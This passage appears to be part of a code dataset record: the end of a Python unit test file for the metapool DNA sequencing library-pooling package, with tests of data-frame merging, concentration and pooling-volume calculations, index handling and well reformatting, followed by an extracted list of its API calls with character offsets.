'A1\t20.55\t12.751753\t80.0\t8_29_13_rk_rh\tABTX_35\t1841.0\t'
'iTru7_110_05\tA23\tCGCTTAAC\tiTru5_01_G\tG1\tGTTCCATG'
'C1\t9.15\t17.582063\t57.5\t8_29_13_rk_lh\tABTX_35\t1842.0\t'
'iTru7_110_06\tB23\tCACCACTA\tiTru5_01_H\tH1\tTAGCTGAG')
test_index_picklist_df = pd.read_csv(
StringIO(test_index_picklist_f), header=0, sep='\t')
test_dna_picklist_df = pd.read_csv(
StringIO(test_dna_picklist_f), header=0, sep='\t')
test_qpcr_df = pd.read_csv(StringIO(test_qpcr_f), header=0, sep='\t')
exp_df = pd.read_csv(StringIO(exp_out_f), header=0, sep='\t')
combined_df = combine_dfs(
test_qpcr_df, test_dna_picklist_df, test_index_picklist_df)
pd.testing.assert_frame_equal(combined_df, exp_df, check_like=True)
def test_add_dna_conc(self):
test_dna = 'Well\tpico_conc\nA1\t2.5\nC1\t20'
test_combined = (
'Well\tCp\tDNA Concentration\tDNA Transfer Volume\tSample Name'
'\tPlate\tCounter\tPrimer i7\tSource Well i7\tIndex i7\tPrimer i5'
'\tSource Well i5\tIndex i5\n'
'A1\t20.55\t12.751753\t80.0\t8_29_13_rk_rh\tABTX_35\t1841.0\t'
'iTru7_110_05\tA23\tCGCTTAAC\tiTru5_01_G\tG1\tGTTCCATG\n'
'C1\t9.15\t17.582063\t57.5\t8_29_13_rk_lh\tABTX_35\t1842.0\t'
'iTru7_110_06\tB23\tCACCACTA\tiTru5_01_H\tH1\tTAGCTGAG')
test_exp_out = (
'Well\tCp\tDNA Concentration\tDNA Transfer Volume\t'
'Sample Name\tPlate\tCounter\tPrimer i7\tSource Well i7\tIndex i7'
'\tPrimer i5\tSource Well i5\tIndex i5\tpico_conc\n'
'A1\t20.55\t12.751753\t80.0\t8_29_13_rk_rh\tABTX_35\t1841.0\t'
'iTru7_110_05\tA23\tCGCTTAAC\tiTru5_01_G\tG1\tGTTCCATG\t2.5\n'
'C1\t9.15\t17.582063\t57.5\t8_29_13_rk_lh\tABTX_35\t1842.0\t'
'iTru7_110_06\tB23\tCACCACTA\tiTru5_01_H\tH1\tTAGCTGAG\t20')
exp_df = pd.read_csv(StringIO(test_exp_out), header=0, sep='\t')
test_in_df = pd.read_csv(StringIO(test_combined), header=0, sep='\t')
test_dna_df = pd.read_csv(StringIO(test_dna), header=0, sep='\t')
obs_df = add_dna_conc(test_in_df, test_dna_df)
pd.testing.assert_frame_equal(obs_df, exp_df, check_like=True)
def test_compute_pico_concentration(self):
obs = compute_pico_concentration(self.dna_vals)
exp = self.pico_conc
npt.assert_allclose(obs, exp)
def test_bcl_scrub_name(self):
self.assertEqual('test_1', bcl_scrub_name('test.1'))
self.assertEqual('test-1', bcl_scrub_name('test-1'))
self.assertEqual('test_1', bcl_scrub_name('test_1'))
def test_rc(self):
self.assertEqual(rc('AGCCT'), 'AGGCT')
def test_sequencer_i5_index(self):
indices = ['AGCT', 'CGGA', 'TGCC']
exp_rc = ['AGCT', 'TCCG', 'GGCA']
obs_hiseq4k = sequencer_i5_index('HiSeq4000', indices)
obs_hiseq25k = sequencer_i5_index('HiSeq2500', indices)
obs_nextseq = sequencer_i5_index('NextSeq', indices)
self.assertListEqual(obs_hiseq4k, exp_rc)
self.assertListEqual(obs_hiseq25k, indices)
self.assertListEqual(obs_nextseq, exp_rc)
with self.assertRaises(ValueError):
sequencer_i5_index('foo', indices)
def test_reformat_interleaved_to_columns(self):
wells = ['A1', 'A23', 'C1', 'C23',
'A2', 'A24', 'C2', 'C24',
'B1', 'B23', 'D1', 'D23',
'B2', 'B24', 'D2', 'D24']
exp = ['A1', 'B6', 'C1', 'D6',
'A7', 'B12', 'C7', 'D12',
'A13', 'B18', 'C13', 'D18',
'A19', 'B24', 'C19', 'D24']
obs = reformat_interleaved_to_columns(wells)
np.testing.assert_array_equal(exp, obs)
if __name__ == "__main__":
main()
| [
"metapool.metapool.compute_shotgun_pooling_values_eqvol",
"metapool.metapool.format_index_picklist",
"metapool.metapool.calculate_norm_vol",
"metapool.metapool.add_dna_conc",
"metapool.metapool.compute_shotgun_pooling_values_qpcr",
"metapool.metapool.format_dna_norm_picklist",
"metapool.metapool.make_2D... | [((28033, 28039), 'unittest.main', 'main', ([], {}), '()\n', (28037, 28039), False, 'from unittest import TestCase, main\n'), ((1089, 1184), 'numpy.array', 'np.array', (['[[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64, 7.32, \n 13.74]]'], {}), '([[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64,\n 7.32, 13.74]])\n', (1097, 1184), True, 'import numpy as np\n'), ((1272, 1367), 'numpy.array', 'np.array', (['[[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64, 7.32, \n 13.74]]'], {}), '([[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64,\n 7.32, 13.74]])\n', (1280, 1367), True, 'import numpy as np\n'), ((1472, 1654), 'numpy.array', 'np.array', (['[[98.14626462, 487.8121413, 484.3480866, 2.183406934], [498.3536649, \n 429.0839787, 402.4270321, 140.1601735], [21.20533391, 582.9456031, \n 732.2655041, 7.545145988]]'], {}), '([[98.14626462, 487.8121413, 484.3480866, 2.183406934], [\n 498.3536649, 429.0839787, 402.4270321, 140.1601735], [21.20533391, \n 582.9456031, 732.2655041, 7.545145988]])\n', (1480, 1654), True, 'import numpy as np\n'), ((1729, 1899), 'numpy.array', 'np.array', (['[[38.4090909, 29.8863636, 29.9242424, 58.6363636], [29.7727273, 30.5681818,\n 30.9090909, 36.5151515], [46.5530303, 28.9393939, 27.7272727, 52.0454545]]'], {}), '([[38.4090909, 29.8863636, 29.9242424, 58.6363636], [29.7727273, \n 30.5681818, 30.9090909, 36.5151515], [46.5530303, 28.9393939, \n 27.7272727, 52.0454545]])\n', (1737, 1899), True, 'import numpy as np\n'), ((3424, 3447), 'io.StringIO', 'StringIO', (['plate_map_csv'], {}), '(plate_map_csv)\n', (3432, 3447), False, 'from io import StringIO\n'), ((3472, 3662), 'pandas.DataFrame', 'pd.DataFrame', (["{'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A', 'A', 'B', 'B'],\n 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'], 'Blank': [False,\n False, True, False]}"], {}), "({'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A',\n 'A', 'B', 'B'], 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'],\n 'Blank': [False, False, True, False]})\n", (3484, 3662), True, 'import pandas as pd\n'), ((3875, 3906), 'metapool.metapool.read_plate_map_csv', 'read_plate_map_csv', (['plate_map_f'], {}), '(plate_map_f)\n', (3893, 3906), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((3916, 3990), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_plate_df', 'exp_plate_df'], {'check_like': '(True)'}), '(obs_plate_df, exp_plate_df, check_like=True)\n', (3945, 3990), True, 'import pandas as pd\n'), ((4410, 4433), 'io.StringIO', 'StringIO', (['plate_map_csv'], {}), '(plate_map_csv)\n', (4418, 4433), False, 'from io import StringIO\n'), ((4448, 4638), 'pandas.DataFrame', 'pd.DataFrame', (["{'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A', 'A', 'B', 'B'],\n 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'], 'Blank': [False,\n False, True, False]}"], {}), "({'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A',\n 'A', 'B', 'B'], 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'],\n 'Blank': [False, False, True, False]})\n", (4460, 4638), True, 'import pandas as pd\n'), ((5037, 5102), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_plate_df', 'exp'], {'check_like': '(True)'}), '(obs_plate_df, exp, check_like=True)\n', (5066, 5102), True, 'import pandas as pd\n'), ((5427, 5450), 'io.StringIO', 'StringIO', (['plate_map_csv'], {}), '(plate_map_csv)\n', (5435, 5450), False, 'from io import StringIO\n'), ((6002, 6113), 'pandas.DataFrame', 'pd.DataFrame', (["{'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration': [3.432, \n 3.239, 10.016, 2.644]}"], {}), "({'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration':\n [3.432, 3.239, 10.016, 2.644]})\n", (6014, 6113), True, 'import pandas as pd\n'), ((6204, 6222), 'io.StringIO', 'StringIO', (['pico_csv'], {}), '(pico_csv)\n', (6212, 6222), False, 'from io import StringIO\n'), ((6246, 6271), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['pico_csv_f'], {}), '(pico_csv_f)\n', (6259, 6271), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((6281, 6353), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_pico_df', 'exp_pico_df'], {'check_like': '(True)'}), '(obs_pico_df, exp_pico_df, check_like=True)\n', (6310, 6353), True, 'import pandas as pd\n'), ((6812, 6924), 'pandas.DataFrame', 'pd.DataFrame', (["{'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration': [3.432, \n 3.239, 10.016, np.nan]}"], {}), "({'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration':\n [3.432, 3.239, 10.016, np.nan]})\n", (6824, 6924), True, 'import pandas as pd\n'), ((7015, 7033), 'io.StringIO', 'StringIO', (['pico_csv'], {}), '(pico_csv)\n', (7023, 7033), False, 'from io import StringIO\n'), ((7057, 7082), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['pico_csv_f'], {}), '(pico_csv_f)\n', (7070, 7082), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((7092, 7164), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_pico_df', 'exp_pico_df'], {'check_like': '(True)'}), '(obs_pico_df, exp_pico_df, check_like=True)\n', (7121, 7164), True, 'import pandas as pd\n'), ((7409, 7468), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['fp_spectramax'], {'plate_reader': '"""SpectraMax_i3x"""'}), "(fp_spectramax, plate_reader='SpectraMax_i3x')\n", (7422, 7468), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((7879, 7915), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (7887, 7915), True, 'import numpy as np\n'), ((7965, 8010), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (7973, 8010), True, 'import numpy as np\n'), ((8057, 8086), 'metapool.metapool.calculate_norm_vol', 'calculate_norm_vol', (['dna_concs'], {}), '(dna_concs)\n', (8075, 8086), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((8096, 8142), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['exp_vols', 'obs_vols'], {}), '(exp_vols, obs_vols)\n', (8122, 8142), True, 'import numpy as np\n'), ((9183, 9228), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (9191, 9228), True, 'import numpy as np\n'), ((9310, 9348), 'numpy.array', 'np.array', (["[['A1', 'A2'], ['B1', 'B2']]"], {}), "([['A1', 'A2'], ['B1', 'B2']])\n", (9318, 9348), True, 'import numpy as np\n'), ((9399, 9447), 'numpy.array', 'np.array', (["[['sam1', 'sam2'], ['blank1', 'sam3']]"], {}), "([['sam1', 'sam2'], ['blank1', 'sam3']])\n", (9407, 9447), True, 'import numpy as np\n'), ((9502, 9538), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (9510, 9538), True, 'import numpy as np\n'), ((9592, 9698), 'metapool.metapool.format_dna_norm_picklist', 'format_dna_norm_picklist', (['dna_vols', 'water_vols', 'wells'], {'sample_names': 'sample_names', 'dna_concs': 'dna_concs'}), '(dna_vols, water_vols, wells, sample_names=\n sample_names, dna_concs=dna_concs)\n', (9616, 9698), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((10877, 10922), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (10885, 10922), True, 'import numpy as np\n'), ((11004, 11042), 'numpy.array', 'np.array', (["[['A1', 'A2'], ['B1', 'B2']]"], {}), "([['A1', 'A2'], ['B1', 'B2']])\n", (11012, 11042), True, 'import numpy as np\n'), ((11090, 11128), 'numpy.array', 'np.array', (["[['D1', 'D2'], ['E1', 'E2']]"], {}), "([['D1', 'D2'], ['E1', 'E2']])\n", (11098, 11128), True, 'import numpy as np\n'), ((11183, 11231), 'numpy.array', 'np.array', (["[['sam1', 'sam2'], ['blank1', 'sam3']]"], {}), "([['sam1', 'sam2'], ['blank1', 'sam3']])\n", (11191, 11231), True, 'import numpy as np\n'), ((11286, 11322), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (11294, 11322), True, 'import numpy as np\n'), ((11376, 11504), 'metapool.metapool.format_dna_norm_picklist', 'format_dna_norm_picklist', (['dna_vols', 'water_vols', 'wells'], {'dest_wells': 'dest_wells', 'sample_names': 'sample_names', 'dna_concs': 'dna_concs'}), '(dna_vols, water_vols, wells, dest_wells=dest_wells,\n sample_names=sample_names, dna_concs=dna_concs)\n', (11400, 11504), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((12763, 12808), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (12771, 12808), True, 'import numpy as np\n'), ((12890, 12928), 'numpy.array', 'np.array', (["[['A1', 'A2'], ['B1', 'B2']]"], {}), "([['A1', 'A2'], ['B1', 'B2']])\n", (12898, 12928), True, 'import numpy as np\n'), ((12979, 13027), 'numpy.array', 'np.array', (["[['sam1', 'sam2'], ['blank1', 'sam3']]"], {}), "([['sam1', 'sam2'], ['blank1', 'sam3']])\n", (12987, 13027), True, 'import numpy as np\n'), ((13086, 13172), 'numpy.array', 'np.array', (["[['Sample_Plate1', 'Sample_Plate1'], ['Sample_Plate2', 'Sample_Plate2']]"], {}), "([['Sample_Plate1', 'Sample_Plate1'], ['Sample_Plate2',\n 'Sample_Plate2']])\n", (13094, 13172), True, 'import numpy as np\n'), ((13224, 13260), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (13232, 13260), True, 'import numpy as np\n'), ((13314, 13449), 'metapool.metapool.format_dna_norm_picklist', 'format_dna_norm_picklist', (['dna_vols', 'water_vols', 'wells'], {'sample_names': 'sample_names', 'sample_plates': 'sample_plates', 'dna_concs': 'dna_concs'}), '(dna_vols, water_vols, wells, sample_names=\n sample_names, sample_plates=sample_plates, dna_concs=dna_concs)\n', (13338, 13449), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((14917, 14951), 'numpy.array', 'np.array', (["['A1', 'A2', 'B1', 'B2']"], {}), "(['A1', 'A2', 'B1', 'B2'])\n", (14925, 14951), True, 'import numpy as np\n'), ((14976, 15020), 'numpy.array', 'np.array', (["['sam1', 'sam2', 'blank1', 'sam3']"], {}), "(['sam1', 'sam2', 'blank1', 'sam3'])\n", (14984, 15020), True, 'import numpy as np\n'), ((15040, 15928), 'pandas.DataFrame', 'pd.DataFrame', (["{'i5 name': {(0): 'iTru5_01_A', (1): 'iTru5_01_B', (2): 'iTru5_01_C', (3):\n 'iTru5_01_D'}, 'i5 plate': {(0): 'iTru5_plate', (1): 'iTru5_plate', (2):\n 'iTru5_plate', (3): 'iTru5_plate'}, 'i5 sequence': {(0): 'ACCGACAA', (1\n ): 'AGTGGCAA', (2): 'CACAGACT', (3): 'CGACACTT'}, 'i5 well': {(0): 'A1',\n (1): 'B1', (2): 'C1', (3): 'D1'}, 'i7 name': {(0): 'iTru7_101_01', (1):\n 'iTru7_101_02', (2): 'iTru7_101_03', (3): 'iTru7_101_04'}, 'i7 plate':\n {(0): 'iTru7_plate', (1): 'iTru7_plate', (2): 'iTru7_plate', (3):\n 'iTru7_plate'}, 'i7 sequence': {(0): 'ACGTTACC', (1): 'CTGTGTTG', (2):\n 'TGAGGTGT', (3): 'GATCCATG'}, 'i7 well': {(0): 'A1', (1): 'A2', (2):\n 'A3', (3): 'A4'}, 'index combo': {(0): 0, (1): 1, (2): 2, (3): 3},\n 'index combo seq': {(0): 'ACCGACAAACGTTACC', (1): 'AGTGGCAACTGTGTTG', (\n 2): 'CACAGACTTGAGGTGT', (3): 'CGACACTTGATCCATG'}}"], {}), "({'i5 name': {(0): 'iTru5_01_A', (1): 'iTru5_01_B', (2):\n 'iTru5_01_C', (3): 'iTru5_01_D'}, 'i5 plate': {(0): 'iTru5_plate', (1):\n 'iTru5_plate', (2): 'iTru5_plate', (3): 'iTru5_plate'}, 'i5 sequence':\n {(0): 'ACCGACAA', (1): 'AGTGGCAA', (2): 'CACAGACT', (3): 'CGACACTT'},\n 'i5 well': {(0): 'A1', (1): 'B1', (2): 'C1', (3): 'D1'}, 'i7 name': {(0\n ): 'iTru7_101_01', (1): 'iTru7_101_02', (2): 'iTru7_101_03', (3):\n 'iTru7_101_04'}, 'i7 plate': {(0): 'iTru7_plate', (1): 'iTru7_plate', (\n 2): 'iTru7_plate', (3): 'iTru7_plate'}, 'i7 sequence': {(0): 'ACGTTACC',\n (1): 'CTGTGTTG', (2): 'TGAGGTGT', (3): 'GATCCATG'}, 'i7 well': {(0):\n 'A1', (1): 'A2', (2): 'A3', (3): 'A4'}, 'index combo': {(0): 0, (1): 1,\n (2): 2, (3): 3}, 'index combo seq': {(0): 'ACCGACAAACGTTACC', (1):\n 'AGTGGCAACTGTGTTG', (2): 'CACAGACTTGAGGTGT', (3): 'CGACACTTGATCCATG'}})\n", (15052, 15928), True, 'import pandas as pd\n'), ((16989, 17047), 'metapool.metapool.format_index_picklist', 'format_index_picklist', (['sample_names', 'sample_wells', 'indices'], {}), '(sample_names, sample_wells, indices)\n', (17010, 17047), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17177, 17217), 'metapool.metapool.compute_qpcr_concentration', 'compute_qpcr_concentration', (['self.cp_vals'], {}), '(self.cp_vals)\n', (17203, 17217), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17256, 17285), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs', 'exp'], {}), '(obs, exp)\n', (17275, 17285), True, 'import numpy.testing as npt\n'), ((17384, 17452), 'metapool.metapool.compute_shotgun_pooling_values_eqvol', 'compute_shotgun_pooling_values_eqvol', (['self.qpcr_conc'], {'total_vol': '(60.0)'}), '(self.qpcr_conc, total_vol=60.0)\n', (17420, 17452), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17570, 17623), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs_sample_vols', 'exp_sample_vols'], {}), '(obs_sample_vols, exp_sample_vols)\n', (17589, 17623), True, 'import numpy.testing as npt\n'), ((17729, 17795), 'metapool.metapool.compute_shotgun_pooling_values_eqvol', 'compute_shotgun_pooling_values_eqvol', (['self.qpcr_conc'], {'total_vol': '(60)'}), '(self.qpcr_conc, total_vol=60)\n', (17765, 17795), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((17913, 17966), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['obs_sample_vols', 'exp_sample_vols'], {}), '(obs_sample_vols, exp_sample_vols)\n', (17932, 17966), True, 'import numpy.testing as npt\n'), ((18047, 18085), 'numpy.array', 'np.array', (['[[1, 12, 400], [200, 40, 1]]'], {}), '([[1, 12, 400], [200, 40, 1]])\n', (18055, 18085), True, 'import numpy as np\n'), ((18139, 18186), 'numpy.array', 'np.array', (['[[0, 50000, 6250], [12500, 50000, 0]]'], {}), '([[0, 50000, 6250], [12500, 50000, 0]])\n', (18147, 18186), True, 'import numpy as np\n'), ((18236, 18285), 'metapool.metapool.compute_shotgun_pooling_values_qpcr', 'compute_shotgun_pooling_values_qpcr', (['sample_concs'], {}), '(sample_concs)\n', (18271, 18285), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((18295, 18334), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['exp_vols', 'obs_vols'], {}), '(exp_vols, obs_vols)\n', (18314, 18334), True, 'import numpy.testing as npt\n'), ((18422, 18460), 'numpy.array', 'np.array', (['[[1, 12, 400], [200, 40, 1]]'], {}), '([[1, 12, 400], [200, 40, 1]])\n', (18430, 18460), True, 'import numpy as np\n'), ((18514, 18600), 'numpy.array', 'np.array', (['[[100, 100, 4166.6666666666], [8333.33333333333, 41666.666666666, 100]]'], {}), '([[100, 100, 4166.6666666666], [8333.33333333333, 41666.666666666, \n 100]])\n', (18522, 18600), True, 'import numpy as np\n'), ((18645, 18701), 'metapool.metapool.compute_shotgun_pooling_values_qpcr_minvol', 'compute_shotgun_pooling_values_qpcr_minvol', (['sample_concs'], {}), '(sample_concs)\n', (18687, 18701), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((18711, 18750), 'numpy.testing.assert_allclose', 'npt.assert_allclose', (['exp_vols', 'obs_vols'], {}), '(exp_vols, obs_vols)\n', (18730, 18750), True, 'import numpy.testing as npt\n'), ((18821, 18889), 'metapool.metapool.compute_shotgun_pooling_values_eqvol', 'compute_shotgun_pooling_values_eqvol', (['self.qpcr_conc'], {'total_vol': '(60.0)'}), '(self.qpcr_conc, total_vol=60.0)\n', (18857, 18889), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((18942, 18997), 'metapool.metapool.estimate_pool_conc_vol', 'estimate_pool_conc_vol', (['obs_sample_vols', 'self.qpcr_conc'], {}), '(obs_sample_vols, self.qpcr_conc)\n', (18964, 18997), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((19090, 19143), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['obs_pool_conc', 'exp_pool_conc'], {}), '(obs_pool_conc, exp_pool_conc)\n', (19113, 19143), True, 'import numpy.testing as npt\n'), ((19152, 19203), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['obs_pool_vol', 'exp_pool_vol'], {}), '(obs_pool_vol, exp_pool_vol)\n', (19175, 19203), True, 'import numpy.testing as npt\n'), ((19276, 19322), 'numpy.array', 'np.array', (['[[10.0, 10.0, 5.0, 5.0, 10.0, 10.0]]'], {}), '([[10.0, 10.0, 5.0, 5.0, 10.0, 10.0]])\n', (19284, 19322), True, 'import numpy as np\n'), ((19999, 20092), 'metapool.metapool.format_pooling_echo_pick_list', 'format_pooling_echo_pick_list', (['vol_sample'], {'max_vol_per_well': '(26)', 'dest_plate_shape': '[16, 